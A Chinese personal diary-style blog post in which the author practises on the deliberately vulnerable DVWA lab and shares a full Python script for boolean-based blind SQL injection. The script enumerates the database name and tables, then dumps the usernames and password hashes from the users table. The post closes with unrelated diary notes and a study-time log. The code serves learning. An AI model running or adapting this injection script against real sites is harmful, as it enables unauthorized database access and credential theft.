好吧,还是用简单的方法吧

昨天不是在做 用python去注入low等级的dvwa吗

今天做了好久,还是卡在获取字段名字那一块。需要用到的循环太多了。

暂时先用简单的取巧的方法做出了最后成果,时间太晚了,没时间把这个代码简化了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
import requests
from bs4 import BeautifulSoup

# Target: DVWA blind SQL injection page, security level "low".
url = 'http://127.0.0.1/vulnerabilities/sqli_blind/?id='
headers = {
    # A valid PHPSESSID and security=low are required for the injection to work.
    'Cookie': 'PHPSESSID=os37h075jj8cn88hepi1acau3a; security=low',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'
}
# Candidate character set for the ascii()/substr() brute force.
# NOTE(review): the published charset was mangled into "[email protected]_" by an
# email-obfuscation filter; restored to lowercase letters, digits and common
# separators. Digits are mandatory — the `users.password` column holds MD5
# hex digests, which the original garbled charset could never match.
data = list('abcdefghijklmnopqrstuvwxyz0123456789@._-')


print("开始破解数据库:")

# --- Step 1: brute-force the length of the current database name ---
# Boolean oracle: a TRUE condition yields the "exists" message inside <pre>
# (text length 31); a FALSE condition yields the "MISSING" message (length 37).
dababase_len = "1' and length(database())=%s%%23&Submit=Submit#"  # length-probe payload
dababase_len_real = ""  # discovered database-name length (kept as a string)
for i in range(1, 100):
    rep = requests.get(url + dababase_len % str(i), headers=headers)
    soup = BeautifulSoup(rep.text, 'lxml')
    value = soup.find_all("pre")[0].get_text()  # find_all returns a list; first <pre> holds the result text
    if len(value) == 31:  # 31 = TRUE ("exists"), 37 = FALSE ("missing")
        dababase_len_real = str(i)
        print("数据库名字的长度:", dababase_len_real)
        break
# --- Step 2: brute-force the database name one character at a time ---
dababase_name = "1' and ascii(substr(database(),%s,1))=%s%%23&Submit=Submit#"  # per-character probe payload
dababase_name_real = ""  # accumulates the recovered database name
for i in range(1, int(dababase_len_real) + 1):  # MySQL substr() positions are 1-based
    for ch in data:  # try every candidate character at position i
        rep = requests.get(url + dababase_name % (str(i), ord(ch)), headers=headers)
        soup = BeautifulSoup(rep.text, 'lxml')
        value = soup.find_all("pre")[0].get_text()
        if len(value) == 31:  # TRUE branch => character at position i is `ch`
            dababase_name_real += ch
            break
print("数据库名字:", dababase_name_real)

# --- Step 3: count the tables in the current database ---
table_num = "1' and (select count(table_name) from information_schema.tables where table_schema=database())= %s%%23&Submit=Submit#"  # table-count probe payload
table_num_rel = ""  # discovered table count (kept as a string)
for i in range(1, 100):
    rep = requests.get(url + table_num % str(i), headers=headers)
    soup = BeautifulSoup(rep.text, 'lxml')
    value = soup.find_all("pre")[0].get_text()
    if len(value) == 31:  # 31 = TRUE ("exists"), 37 = FALSE ("missing")
        table_num_rel = str(i)
        print("表的数量:", table_num_rel)
        break

# --- Step 4: brute-force the length of each table name ---
table_len = "1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit %s,1),1))=%s%%23&Submit=Submit#"
table_len_rel = []  # length (as string) of each table name, in `limit` order
for i in range(int(table_num_rel)):  # `limit i,1` offsets are 0-based
    for guess in range(1, 100):  # candidate length for table i
        rep = requests.get(url + table_len % (str(i), guess), headers=headers)
        soup = BeautifulSoup(rep.text, 'lxml')
        value = soup.find_all("pre")[0].get_text()
        if len(value) == 31:  # 31 = TRUE ("exists"), 37 = FALSE ("missing")
            table_len_rel.append(str(guess))
            print('第', str(i + 1), '个表的名字长度', str(guess))
            break

# #各个表的名字
# table_name = "1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1))=%s%%23&Submit=Submit#"
# table_name_rel= []
# for i in range(0, len(table_len_rel)): # 0:第一个表 1:第二个表
# a=""
# for i2 in range(0,int(table_len_rel[i])+1): # 0-
# for i3 in data:
# url_real = url + table_name % (str(i), str(i2) ,ord(str(i3)))
# # print(url_real)
# rep = requests.get(url_real, headers=headers)
# rep_text = rep.text
# soup = BeautifulSoup(rep.text, 'lxml')
# tag = soup.find_all("pre")
# value = tag[0].get_text()
# if len(value) == 31:
# a = a + str(i3)
# print(a)
# break
# else:
# pass
# table_name_rel.append(a)
# print("数据库中的表:",table_name_rel)
#
# #每个表有几个字段
# col_num = "1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='%s')=%s%%23&Submit=Submit#"
# col_num_rel = {}
# for i in range(0,len(table_name_rel)):
# for i2 in range(1,100):
# url_real = url + col_num % (str(table_name_rel[i]),str(i2))
# # print(url_real)
# rep = requests.get(url_real, headers=headers)
# rep_text = rep.text
# soup = BeautifulSoup(rep.text, 'lxml')
# tag = soup.find_all("pre")
# value = tag[0].get_text()
# if len(value) == 31:
# print("第",str(i+1),"表里有",str(i2),"个字段")
# col_num_rel.update({str(i+1):str(i2)})
# break
# else:
# pass #{'1': '3', '2': '8'}
# print(col_num_rel)
#
#
# # #选择user表,破解出字段名
# # col_name="1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit %s,1),%s,1)) =%s%%23&Submit=Submit#"
# # col_name_rel=[]
# # for i in range(int(col_num_rel["2"])):
# # a=""
# # for i2 in range(15):
# # for i3 in data:
# # url_real = url + col_name % (str(i), str(i2), ord(str(i3)))
# # #print(url_real)
# # rep = requests.get(url_real, headers=headers)
# # rep_text = rep.text
# # soup = BeautifulSoup(rep.text, 'lxml')
# # tag = soup.find_all("pre")
# # value = tag[0].get_text()
# # if len(value) == 31:
# # a += str(i3)
# #
# # break
# # else:
# # pass
# # # print(a)
# # col_name_rel.append(a)
# # print(col_name_rel)
#
# #user表,user和passwd中额全部信息
# user_len ="1' and length(substr((select user from users limit %s,1),1))=%s%%23&Submit=Submit#"
# user_len_rel=[]
# for i in range(10):
# for i2 in range(20):
# url_real = url + user_len % (str(i),str(i2))
# # print(url_real)
# rep = requests.get(url_real, headers=headers)
# rep_text = rep.text
# soup = BeautifulSoup(rep.text, 'lxml')
# tag = soup.find_all("pre")
# value = tag[0].get_text()
# if len(value) == 31:
# print(i2)
# break
# else:
# pass


# --- Final step: dump `user` and `password` from the `users` table ---
user_name = "1' and ascii(substr((select user from users limit %s,1),%s,1))=%s%%23&Submit=Submit#"
password_name = "1' and ascii(substr((select password from users limit %s,1),%s,1))=%s%%23&Submit=Submit#"


def _guess_char(payload, row, pos):
    """Brute-force one character: return the character of `payload`'s target
    column at 1-based position `pos` for row `row`, or '' if no candidate
    in `data` matches (blank positions are simply skipped)."""
    for ch in data:
        rep = requests.get(url + payload % (str(row), str(pos), ord(ch)), headers=headers)
        soup = BeautifulSoup(rep.text, 'lxml')
        value = soup.find_all("pre")[0].get_text()
        if len(value) == 31:  # 31 = TRUE ("exists"), 37 = FALSE ("missing")
            return ch
    return ''


for row in range(0, 10):  # probe up to 10 rows of the users table (`limit` is 0-based)
    # User name: positions 1..9 (substr() is 1-based; names longer than
    # 9 characters would be truncated here, as in the original).
    a = "".join(_guess_char(user_name, row, pos) for pos in range(1, 10))
    print('用户名:', a)

    # Password: DVWA stores MD5 hex digests — exactly 32 characters.
    b = "".join(_guess_char(password_name, row, pos) for pos in range(1, 33))
    print('密码:', b)

想起来一件事情

之前不是有一天玩那个人类:一败涂地吗。这个3D我居然也头晕。

昨天hexo上传 日记到github 失败了。今天还忘记处理了。明天搞。

现在欠的时间:10.5小时

越欠越多,明天星期五。手头上的事情不是很紧了,补补补

1
2
3
4
5
6
6月16号 7:30-10:00 am 2.5小时   英语阅读
6.00-10.00 pm 2小时 (html+php+python)+英语听力
6月17号 7:30-10:30 am 3个小时 英语阅读
6月18号 1小时英语阅读
6月19号 1个小时英语阅读(我全用来写python了)
6月20号 1个小时英语阅读(我全用来写python了)